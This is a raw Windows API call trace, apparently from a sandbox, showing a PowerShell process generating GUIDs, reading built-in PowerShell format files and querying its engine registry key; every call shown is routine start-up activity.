	[0680.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0680.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0680.350] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xe8c28a5e, Data2=0x62de, Data3=0x4207, Data4=([0]=0xa3, [1]=0xa9, [2]=0x38, [3]=0x22, [4]=0xf1, [5]=0x15, [6]=0x7a, [7]=0x4f))) returned 0x0
	[0680.351] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x9fa4341a, Data2=0xc27a, Data3=0x4fba, Data4=([0]=0x92, [1]=0xa5, [2]=0x72, [3]=0x8b, [4]=0x99, [5]=0xc4, [6]=0x5d, [7]=0x23))) returned 0x0
	[0680.351] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xeef72fc8, Data2=0x62a3, Data3=0x407a, Data4=([0]=0xa5, [1]=0xa7, [2]=0xcb, [3]=0x8b, [4]=0x45, [5]=0xe3, [6]=0xf6, [7]=0xb6))) returned 0x0
	[0680.351] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x557a8578, Data2=0x3561, Data3=0x456d, Data4=([0]=0xae, [1]=0x25, [2]=0xd9, [3]=0x40, [4]=0x7f, [5]=0x13, [6]=0x71, [7]=0x6b))) returned 0x0
	[0680.351] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x5b39cb14, Data2=0x1d05, Data3=0x4b8d, Data4=([0]=0xa6, [1]=0x95, [2]=0xa7, [3]=0xff, [4]=0xfa, [5]=0x5a, [6]=0x88, [7]=0x33))) returned 0x0
	[0680.351] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x76a2a69, Data2=0xd63e, Data3=0x499f, Data4=([0]=0xab, [1]=0xad, [2]=0x10, [3]=0x38, [4]=0x84, [5]=0xc7, [6]=0xd5, [7]=0xfa))) returned 0x0
	[0680.351] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x3d49c9fb, Data2=0x11ea, Data3=0x467d, Data4=([0]=0xb1, [1]=0xd8, [2]=0xc3, [3]=0x1f, [4]=0xc6, [5]=0xf0, [6]=0x61, [7]=0xf4))) returned 0x0
	[0680.352] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x3b8c2966, Data2=0x69d6, Data3=0x44ba, Data4=([0]=0xb9, [1]=0x2, [2]=0xb, [3]=0x2e, [4]=0x18, [5]=0xa4, [6]=0x99, [7]=0x63))) returned 0x0
	[0680.352] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x270eaf9, Data2=0x4516, Data3=0x487e, Data4=([0]=0xbc, [1]=0x57, [2]=0x7b, [3]=0xee, [4]=0x62, [5]=0xd5, [6]=0x9c, [7]=0xf4))) returned 0x0
	[0680.352] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x8271fa35, Data2=0x8dcb, Data3=0x45c8, Data4=([0]=0xb4, [1]=0x11, [2]=0x10, [3]=0xb5, [4]=0x9f, [5]=0xf2, [6]=0x34, [7]=0x3e))) returned 0x0
	[0680.352] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x1be2fbf6, Data2=0x96df, Data3=0x4d31, Data4=([0]=0x9e, [1]=0x97, [2]=0xf0, [3]=0x8, [4]=0x50, [5]=0x4a, [6]=0x17, [7]=0xa0))) returned 0x0
	[0680.352] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xb9e4233e, Data2=0x37a4, Data3=0x42a1, Data4=([0]=0x92, [1]=0x93, [2]=0x35, [3]=0xe1, [4]=0x34, [5]=0x4f, [6]=0x45, [7]=0xde))) returned 0x0
	[0680.353] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xca24a381, Data2=0x2cde, Data3=0x41b1, Data4=([0]=0xb1, [1]=0xa5, [2]=0x3, [3]=0xd, [4]=0x8f, [5]=0xbe, [6]=0xa, [7]=0xc0))) returned 0x0
	[0680.353] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x79862411, Data2=0x7eb, Data3=0x4aa1, Data4=([0]=0xa0, [1]=0x6a, [2]=0xf, [3]=0xfd, [4]=0x55, [5]=0x5e, [6]=0xf2, [7]=0xef))) returned 0x0
	[0680.353] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x605b4928, Data2=0x32ac, Data3=0x4598, Data4=([0]=0x9f, [1]=0xd5, [2]=0x87, [3]=0xf7, [4]=0xec, [5]=0x12, [6]=0xd4, [7]=0x2c))) returned 0x0
	[0680.353] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xd381311b, Data2=0x6ba9, Data3=0x465a, Data4=([0]=0x86, [1]=0x3d, [2]=0xe6, [3]=0xcb, [4]=0x3b, [5]=0xaf, [6]=0x3, [7]=0x37))) returned 0x0
	[0680.353] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xaeff4279, Data2=0xbf1d, Data3=0x4dcb, Data4=([0]=0xaf, [1]=0x94, [2]=0xb6, [3]=0x46, [4]=0xa, [5]=0x2c, [6]=0x7f, [7]=0xd6))) returned 0x0
	[0680.354] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x287f9ea6, Data2=0x4065, Data3=0x4ec3, Data4=([0]=0xad, [1]=0xdb, [2]=0xbe, [3]=0x8d, [4]=0x3e, [5]=0x77, [6]=0x22, [7]=0x60))) returned 0x0
	[0680.354] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xf3921d48, Data2=0x76a9, Data3=0x47a5, Data4=([0]=0x85, [1]=0xda, [2]=0xa3, [3]=0x27, [4]=0x60, [5]=0xd2, [6]=0xa7, [7]=0x8c))) returned 0x0
	[0680.354] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x28143d1b, Data2=0x7080, Data3=0x44e3, Data4=([0]=0xb6, [1]=0x2, [2]=0xf5, [3]=0xc5, [4]=0xb6, [5]=0xaa, [6]=0xd8, [7]=0x55))) returned 0x0
	[0680.354] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xee303244, Data2=0xc542, Data3=0x46c3, Data4=([0]=0xbc, [1]=0xb6, [2]=0x20, [3]=0x38, [4]=0x72, [5]=0xfe, [6]=0xb3, [7]=0x5))) returned 0x0
	[0680.354] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x208734cf, Data2=0x68a7, Data3=0x45e3, Data4=([0]=0xb5, [1]=0x4b, [2]=0x62, [3]=0x61, [4]=0xe7, [5]=0x19, [6]=0xb0, [7]=0x89))) returned 0x0
	[0680.355] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xbc7b1282, Data2=0x78d8, Data3=0x4336, Data4=([0]=0xa1, [1]=0x6d, [2]=0x8d, [3]=0xc, [4]=0xd0, [5]=0xa, [6]=0x9f, [7]=0x7))) returned 0x0
	[0680.355] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x7a6e0374, Data2=0x2867, Data3=0x4ed7, Data4=([0]=0x87, [1]=0x41, [2]=0x8e, [3]=0x7d, [4]=0x1a, [5]=0x57, [6]=0x27, [7]=0x1d))) returned 0x0
	[0680.355] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x409df558, Data2=0x935d, Data3=0x4f31, Data4=([0]=0x83, [1]=0x59, [2]=0x7a, [3]=0xdd, [4]=0x3, [5]=0x20, [6]=0xdf, [7]=0x77))) returned 0x0
	[0680.355] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x51d082d8, Data2=0x9879, Data3=0x422a, Data4=([0]=0xbf, [1]=0xb7, [2]=0x99, [3]=0x3a, [4]=0x20, [5]=0xf5, [6]=0x65, [7]=0x9a))) returned 0x0
	[0680.355] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x6d47c6f2, Data2=0x6e41, Data3=0x402e, Data4=([0]=0xb2, [1]=0x85, [2]=0x28, [3]=0xf6, [4]=0x64, [5]=0x59, [6]=0xd, [7]=0x90))) returned 0x0
	[0680.355] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x652bb6bd, Data2=0x54f2, Data3=0x4c4b, Data4=([0]=0xb6, [1]=0xd2, [2]=0x81, [3]=0xd7, [4]=0x31, [5]=0x12, [6]=0x5d, [7]=0xde))) returned 0x0
	[0680.356] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xe64d10ac, Data2=0xf176, Data3=0x4a97, Data4=([0]=0xb4, [1]=0xd7, [2]=0x8d, [3]=0x37, [4]=0x43, [5]=0x7f, [6]=0x59, [7]=0x5b))) returned 0x0
	[0680.356] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xc4144975, Data2=0xe586, Data3=0x47b8, Data4=([0]=0x9b, [1]=0x7, [2]=0xad, [3]=0x4c, [4]=0x4e, [5]=0xce, [6]=0x95, [7]=0xab))) returned 0x0
	[0680.356] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x70b7965c, Data2=0x7109, Data3=0x4b8f, Data4=([0]=0x9a, [1]=0x3d, [2]=0xa8, [3]=0x5, [4]=0x5a, [5]=0x52, [6]=0xb6, [7]=0xb1))) returned 0x0
	[0680.357] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x8a594022, Data2=0x8e92, Data3=0x41a5, Data4=([0]=0x86, [1]=0xac, [2]=0x46, [3]=0x35, [4]=0xc3, [5]=0x5e, [6]=0x39, [7]=0xfa))) returned 0x0
	[0680.357] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xe23a11f1, Data2=0xd5c0, Data3=0x4618, Data4=([0]=0x88, [1]=0xde, [2]=0x7d, [3]=0x6c, [4]=0xe3, [5]=0x1c, [6]=0xb3, [7]=0x8b))) returned 0x0
	[0680.364] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xa21b6e2c, Data2=0x8349, Data3=0x47c0, Data4=([0]=0x83, [1]=0x4d, [2]=0x1a, [3]=0x64, [4]=0xf4, [5]=0x7f, [6]=0x3e, [7]=0x2))) returned 0x0
	[0680.364] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x5a66d610, Data2=0xc563, Data3=0x46b6, Data4=([0]=0x86, [1]=0xdc, [2]=0x6a, [3]=0xe2, [4]=0x6d, [5]=0x14, [6]=0xbe, [7]=0x6c))) returned 0x0
	[0680.364] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xa98c2e4f, Data2=0x9813, Data3=0x49c8, Data4=([0]=0x9b, [1]=0xc3, [2]=0x15, [3]=0x99, [4]=0xc1, [5]=0x37, [6]=0xd4, [7]=0x49))) returned 0x0
	[0680.364] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x4be1cde, Data2=0x96fa, Data3=0x4eb2, Data4=([0]=0x86, [1]=0x4c, [2]=0x56, [3]=0xc4, [4]=0x39, [5]=0xe6, [6]=0xd0, [7]=0x4c))) returned 0x0
	[0680.365] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xe447a901, Data2=0xb3c3, Data3=0x4802, Data4=([0]=0x82, [1]=0xd9, [2]=0x5b, [3]=0x4, [4]=0xfd, [5]=0x76, [6]=0xb, [7]=0x4c))) returned 0x0
	[0680.365] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x972124f0, Data2=0x849f, Data3=0x444b, Data4=([0]=0x82, [1]=0x1c, [2]=0xc5, [3]=0x90, [4]=0x3f, [5]=0xab, [6]=0x4f, [7]=0x18))) returned 0x0
	[0680.365] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x146c9c68, Data2=0xd1da, Data3=0x4380, Data4=([0]=0x99, [1]=0x10, [2]=0x3f, [3]=0xbb, [4]=0x4d, [5]=0xf5, [6]=0xb8, [7]=0xa8))) returned 0x0
	[0680.365] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x992a539e, Data2=0x4ad6, Data3=0x4ac0, Data4=([0]=0x85, [1]=0x6d, [2]=0x7a, [3]=0xd7, [4]=0x39, [5]=0x5c, [6]=0x45, [7]=0xf1))) returned 0x0
	[0680.365] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xe0a35642, Data2=0xe11b, Data3=0x4e2a, Data4=([0]=0xbe, [1]=0x84, [2]=0x24, [3]=0xc, [4]=0x8d, [5]=0x8d, [6]=0x43, [7]=0x2c))) returned 0x0
	[0680.365] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x4f537830, Data2=0xf8bb, Data3=0x4d43, Data4=([0]=0xb8, [1]=0x8b, [2]=0x97, [3]=0xc1, [4]=0xc9, [5]=0xe1, [6]=0x6d, [7]=0xc2))) returned 0x0
	[0680.366] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x9364cde6, Data2=0xb311, Data3=0x4a70, Data4=([0]=0x95, [1]=0xc, [2]=0x4f, [3]=0x11, [4]=0x66, [5]=0xde, [6]=0xdf, [7]=0x9))) returned 0x0
	[0680.366] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xc480c0b0, Data2=0x65f1, Data3=0x402b, Data4=([0]=0x8a, [1]=0xf6, [2]=0x79, [3]=0x4e, [4]=0xf2, [5]=0x98, [6]=0xb9, [7]=0x9c))) returned 0x0
	[0680.366] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xf7d39a03, Data2=0x1b46, Data3=0x4e91, Data4=([0]=0xa5, [1]=0x87, [2]=0x59, [3]=0xa6, [4]=0x35, [5]=0xf9, [6]=0xde, [7]=0x95))) returned 0x0
	[0680.366] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x9ed67805, Data2=0x39cc, Data3=0x47cd, Data4=([0]=0xa2, [1]=0x43, [2]=0xa3, [3]=0x7d, [4]=0x56, [5]=0x3e, [6]=0x7c, [7]=0xa9))) returned 0x0
	[0680.366] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x845b1cbd, Data2=0xee28, Data3=0x40a7, Data4=([0]=0xb6, [1]=0x88, [2]=0xd0, [3]=0x32, [4]=0x7, [5]=0xa0, [6]=0xbb, [7]=0xcd))) returned 0x0
	[0680.367] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0680.367] GetFileType (hFile=0x308) returned 0x1
	[0680.367] SetErrorMode (uMode=0x1) returned 0x1
	[0680.367] GetFileType (hFile=0x308) returned 0x1
	[0680.367] ReadFile (in: hFile=0x308, lpBuffer=0x35bd228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35bd228*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.368] ReadFile (in: hFile=0x308, lpBuffer=0x35bd228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35bd228*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.368] ReadFile (in: hFile=0x308, lpBuffer=0x35bd228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35bd228*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.368] ReadFile (in: hFile=0x308, lpBuffer=0x35bd228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35bd228*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.369] ReadFile (in: hFile=0x308, lpBuffer=0x35bd228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35bd228*, lpNumberOfBytesRead=0x26cef8*=0x8b4, lpOverlapped=0x0) returned 1
	[0680.369] ReadFile (in: hFile=0x308, lpBuffer=0x35bc644, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35bc644*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0680.369] ReadFile (in: hFile=0x308, lpBuffer=0x35bd228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35bd228*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0680.369] CloseHandle (hObject=0x308) returned 1
	[0680.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0680.369] SetErrorMode (uMode=0x1) returned 0x1
	[0680.370] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cea0 | out: lpFileInformation=0x26cea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0680.370] SetErrorMode (uMode=0x1) returned 0x1
	[0680.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0680.370] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf88 | out: phkResult=0x26cf88*=0x308) returned 0x0
	[0680.370] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cf0c, lpData=0x0, lpcbData=0x26cf08*=0x0 | out: lpType=0x26cf0c*=0x1, lpData=0x0, lpcbData=0x26cf08*=0x56) returned 0x0
	[0680.370] CoTaskMemAlloc (cb=0x5a) returned 0x1b8634a0
	[0680.370] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cedc, lpData=0x1b8634a0, lpcbData=0x26ced8*=0x56 | out: lpType=0x26cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ced8*=0x56) returned 0x0
	[0680.370] CoTaskMemFree (pv=0x1b8634a0) 
	[0680.371] RegCloseKey (hKey=0x308) returned 0x0
	[0680.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0680.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0680.371] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xdc9dc4b4, Data2=0xb622, Data3=0x461f, Data4=([0]=0x8e, [1]=0x1f, [2]=0x65, [3]=0xa6, [4]=0x79, [5]=0x6, [6]=0xe1, [7]=0xe))) returned 0x0
	[0680.371] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x38a84e98, Data2=0x70db, Data3=0x43e7, Data4=([0]=0x9f, [1]=0xaf, [2]=0x2c, [3]=0x5a, [4]=0x75, [5]=0xfa, [6]=0x73, [7]=0x22))) returned 0x0
	[0680.372] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0680.372] GetFileType (hFile=0x308) returned 0x1
	[0680.372] SetErrorMode (uMode=0x1) returned 0x1
	[0680.372] GetFileType (hFile=0x308) returned 0x1
	[0680.372] ReadFile (in: hFile=0x308, lpBuffer=0x35fb010, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35fb010*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.373] ReadFile (in: hFile=0x308, lpBuffer=0x35fb010, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35fb010*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.373] ReadFile (in: hFile=0x308, lpBuffer=0x35fb010, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35fb010*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.374] ReadFile (in: hFile=0x308, lpBuffer=0x35fb010, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35fb010*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0680.374] ReadFile (in: hFile=0x308, lpBuffer=0x35fb010, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35fb010*, lpNumberOfBytesRead=0x26cef8*=0xe98, lpOverlapped=0x0) returned 1
	[0680.375] ReadFile (in: hFile=0x308, lpBuffer=0x35fa610, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35fa610*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0680.375] ReadFile (in: hFile=0x308, lpBuffer=0x35fb010, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x35fb010*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0680.375] CloseHandle (hObject=0x308) returned 1
	[0680.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0680.375] SetErrorMode (uMode=0x1) returned 0x1
	[0680.375] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cea0 | out: lpFileInformation=0x26cea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0680.375] SetErrorMode (uMode=0x1) returned 0x1
	[0680.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0680.376] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf88 | out: phkResult=0x26cf88*=0x308) returned 0x0
	[0680.376] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cf0c, lpData=0x0, lpcbData=0x26cf08*=0x0 | out: lpType=0x26cf0c*=0x1, lpData=0x0, lpcbData=0x26cf08*=0x56) returned 0x0
	[0680.376] CoTaskMemAlloc (cb=0x5a) returned 0x1b8634a0
	[0680.376] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cedc, lpData=0x1b8634a0, lpcbData=0x26ced8*=0x56 | out: lpType=0x26cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ced8*=0x56) returned 0x0
	[0680.376] CoTaskMemFree (pv=0x1b8634a0) 
	[0680.376] RegCloseKey (hKey=0x308) returned 0x0
	[0680.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0680.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0681.793] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x4044b58a, Data2=0x2bc5, Data3=0x4f20, Data4=([0]=0x98, [1]=0x74, [2]=0x49, [3]=0x6, [4]=0x5a, [5]=0x8, [6]=0x2f, [7]=0x88))) returned 0x0
	[0681.794] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x40d192f7, Data2=0x5ba0, Data3=0x4277, Data4=([0]=0x81, [1]=0xbb, [2]=0xa8, [3]=0xb4, [4]=0x2e, [5]=0x1e, [6]=0xa1, [7]=0xbc))) returned 0x0
	[0681.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
